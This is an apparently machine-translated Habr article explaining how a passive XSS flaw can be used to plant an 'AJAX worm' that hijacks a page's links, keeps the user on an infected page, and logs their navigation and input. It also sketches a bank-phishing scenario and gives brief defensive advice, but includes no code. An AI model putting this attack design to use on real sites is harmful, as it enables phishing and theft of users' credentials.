📜 ⬆️ ⬇️

One step from passive XSS vulnerability to the introduction of the AJAX worm

Many times I meet with the opinion that passive XSS vulnerability does not represent a great danger and there is not much to worry about. And despite the fact that this is partly true (if compared with other, more catastrophic errors), the possibility of implementing your code on a vulnerable site, even requiring significant additional actions to deceive the user, can lead to serious consequences, in particular, the ability to completely intercept further user actions.

What is an AJAX worm?


AJAX worm is a javascript code that modifies the links on the page of its location in such a way as to remain in the context of the current page when the user navigates through these links replacing the full AJAX navigation with requests. In the simplest version is implemented in several lines, as follows.

1. Getting all the links on the page
2. Adding all of them their own handler
3. Execution of AJAX request with the address of the clicked link
4. Substitution of page content with the result obtained in paragraph 3
5. Infection of new content links

It is clear that this is a very simplified scenario, a full-fledged “combat” worm will follow the correct change of the title of the page and the connection of css and js files in the header, and if possible exploit url spoofing in those browsers where this is possible. But the simplest option, placing the data immediately in the body element, is quite efficient. An example implementation.
')
A small digression - if there was an opportunity to get an arbitrary page code from a browser on the network, the security problem would be much more serious, fortunately all modern browsers do not allow making cross-site requests. But this can also be circumvented by sending requests to an intermediate application located on the same domain as the page with the worm and performing the function of content rocking.


In the simplest case, this application is implemented in one line on php. The combat option should at least be able to cache the downloaded data to minimize the time the client received the data 2 times, well, in the very ideal case - to support the reception / transmission of cookies, and to make requests through a proxy set so as not to give out too much light ip in the logs.

Even in this simplest version, we get an infected page that allows us to "move" around the network, actually staying on one page and, if desired, logging the user's movements and the data entered by him. Of course, if the user notices that the page address magically remains the same or that requests to an unknown domain are constantly hanging in the status bar, he can immediately sound the alarm, but you and I are so smart, and the average user may well ignore this fact.

Although this method allows you to do a lot of dirty tricks, it requires too many actions to initially lure a person into the trap. Not to mention the fact that such a page will very quickly appear in various blacklists of browsers, And that if the trap page turns out to be someone else’s page, which is completely safe at first glance, from a domain that is familiar to the user. This is where the opportunity to deploy your code through XSS vulnerabilities on another site comes into play.

Imagine a smart attacker conducting a phishing attack on users of the bank. He does not need to create any fake websites, it’s enough to indicate in the letter a link to the vulnerable page of the site and the user who is sure that he is switching to the trusted domain will be in the infected zone. And it’s not at all necessary what he will see in front of him, for example, a search on a site, javascript allows arbitrarily modifying the content, which means that the user can imagine an index or any other page.

Moreover, an attacker can completely avoid the use of a layer for receiving data, because the requested data is within one domain, which means that they can be obtained by direct AJAX request. Alternatively, an attacker could use the same vulnerable page to minimize the visibility of the infection, since this will lead to real transitions between pages, and the target link can be encoded, for example, as an anchor in the URL.



And what to do with all this.


Prevent XSS vulnerabilities - manual and automated testing, as well as the use of frameworks with the correct data shielding policy from the outside.

From the moment the attacker injected his code into the website page, we have completely lost control, and any security scripts can be cut from the code, and the data entered by the user is transferred to a third-party server. The only half-measure can be the fixed page of the login form and the checking referrer and the ip address of the sending login script, so you can not allow the attacker to automatically get into the system. That, however, will not prevent him from using the stolen data himself.

Source: https://habr.com/ru/post/74127/


All Articles